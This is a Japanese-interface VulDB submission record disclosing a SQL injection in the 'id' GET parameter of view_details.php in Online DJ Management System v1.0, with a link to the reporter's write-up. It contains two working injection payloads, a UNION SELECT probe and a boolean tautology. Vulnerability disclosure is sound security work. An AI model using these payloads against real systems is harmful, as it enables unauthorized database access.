| タイトル | Online DJ Management System v1.0 /odjms/admin/inquiries/view_details.php GET parameter id exists SQL injection vulnerability |
|---|
| 説明 | An issue was discovered in Online DJ Management System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /odjms/admin/inquiries/view_details.php?id.
Payload1:id=-1' union all select null,null,null,null,concat(0x66676869,0x515253),null,null-- -
Payload2:id=1' and 6=6 AND 'x'='x |
|---|
| ソース | ⚠️ https://github.com/yoyoyoyoyohane/bug_report/blob/main/SQLi-1.md |
|---|
| ユーザー | yohane (UID 45724) |
|---|
| 送信 | 2023年04月26日 12:58 (3 年 ago) |
|---|
| モデレーション | 2023年04月28日 13:19 (2 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 227647 [SourceCodester Online DJ Management System 1.0 GET Parameter view_details.php 識別子 SQLインジェクション] |
|---|
| ポイント | 19 |
|---|